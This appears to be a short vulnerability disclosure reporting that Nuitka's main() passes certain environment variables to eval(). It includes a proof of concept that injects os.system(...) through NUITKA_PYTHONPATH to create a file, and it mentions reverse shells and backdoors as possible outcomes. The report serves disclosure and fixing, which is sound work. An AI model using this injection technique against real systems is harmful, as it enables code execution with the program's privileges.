Description

The main() function uses the eval() function which can lead to contextual code execution, allowing an attacker to gain access to a system and execute commands with the privileges of the running program by setting NUITKA_PYTHONPATH, NUITKA_NAMESPACES or NUITKA_PTH_IMPORTED to a malicious payload string. This can lead to backdoors, reverse shells or reading/writing to privileged files.

One example of a similar vulnerability is CVE-2022-0845 in the popular pytorch-lightning repository. [See References]

Proof of Concept

• Set malicious payload

$ export NUITKA_PYTHONPATH='os.system("touch rickroll")'

• Run nuitka/__main__.py
• Code gets executed!

$ ls rickroll
rickroll